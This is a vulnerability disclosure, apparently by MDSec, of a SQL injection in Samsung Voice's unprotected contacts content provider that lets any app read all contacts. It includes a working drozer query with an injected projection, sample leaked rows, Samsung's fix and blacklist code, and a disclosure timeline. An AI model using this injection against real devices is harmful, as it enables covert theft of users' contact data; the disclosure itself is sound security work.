The Samsung Voice application provides a means to control your smartphone through voice commands, such as initiating calls to the device’s contacts. It is installed by default on Samsung smartphones, including the Galaxy S6. The application is relatively privileged, holding permissions such as android.permission.READ_CONTACTS, allowing it to read the user’s contact data.
Versions before 1.1.2009 of the SVF application have no permissions applied to the com.samsung.android.svf.contacts.contentprovider content provider, meaning it can be trivially interacted with by other applications on the device. The content provider provides a means to query the device’s contacts database. MDSec identified a SQL injection vulnerability in the projection of the SQL query used that allows any application on the device to circumvent the Android permission model and retrieve all the device’s contacts, without the android.permission.READ_CONTACTS permission.
An example of how this issue can be exploited using the drozer attack framework is shown below:
[code lang=”bash”]dz> run app.provider.query content://com.samsung.android.svf.contacts.contentprovider –projection “* from data limit 2–”
| _id | raw_contact_id | contact_id | version | mimetype | data1 | data2 | data3 | data4 | data5 | data6 | data7 | data8 | data9 | times_contacted | starred | display_name | phonetic_name | lookup | in_visible_group | original_id |
| 1 | 9 | 12 | 3 | vnd.android.cursor.item/photo | null | null | null | null | null | null | null | null | null | 0 | 0 | abc@abc.com | null | 814i1e | 0 | null |
| 2 | 19 | 4 | 3 | vnd.android.cursor.item/nickname | null | null | null | null | null | null | null | null | null | 0 | 0 | foo@bar.com | null | 814i1e92d164892150d7 | 0 | null |
dz>
[/code]
This issue is resolved in version 1.1.2009 of the SVF application. The issue was resolved by applying the following permissions to the content provider:
[code lang=”bash”]
Package: com.samsung.android.svf
Authority: com.samsung.android.svf.contacts.contentprovider
Read Permission: com.sec.voice.permission.RECEIVE
Write Permission: com.sec.voice.permission.RECEIVE
[/code]
In addition to the above, Samsung attempted to resolve the issue by blacklisting certain characters from the passed parameters, as shown below:
[code lang=”java”]
public Cursor query(Uri arg0, String[] arg1, String arg2, String[] arg3, String arg4) {
Log.i(TAG, “query Uri:=” + arg0 + ” 1:=” + arg1 + ” 2:=” + arg2 + ” 3:=” + arg3 + ” 4:=” + arg4);
Cursor ret = super.query(arg0, arg1, arg2, arg3, arg4);
for (String query : arg1) {
if (query.contains(“*”) || query.contains(IBase.SEMICOLON) || query.contains(“‘”) || query.contains(“\””)) {
return null;
}
}
Log.i(TAG, “query result:=” + ret + ” size(” + ret.getCount() + IBase.CLOSING_BRACKET);
return ret;
}
[/code]
It’s worth noting that this blacklisting approach would not be sufficient to resolve the issue on its own.
13/05/2015: | Vulnerability reported to Samsung |
15/05/2015: | Response from Samsung indicating they will review the issue |
15/05/2015: | MDSec provide ROM and package versions to Samsung |
18/06/2015: | Samsung provide update indicating a fix will take time due to negotiations with carriers |
24/07/2015: | Samsung provide further update indicating they are negotiating a release schedule with the carriers |
17/09/2015: | MDSec requests an update on the issue |
23/09/2015: | Samsung indicate they are negotiating an OTA update with the carriers |
04/11/2015: | Update to package received. MDSec ask Samsung if the issue has been resolved |
09/11/2015: | Samsung indicate they believe the issue is patched |
This issue was disclosed by Dominic Chell.
If you’re interested in learning more about the exploitation of mobile devices, get in touch to find out more about our Mobile Application Hacker’s Handbook training or Mobile Security services.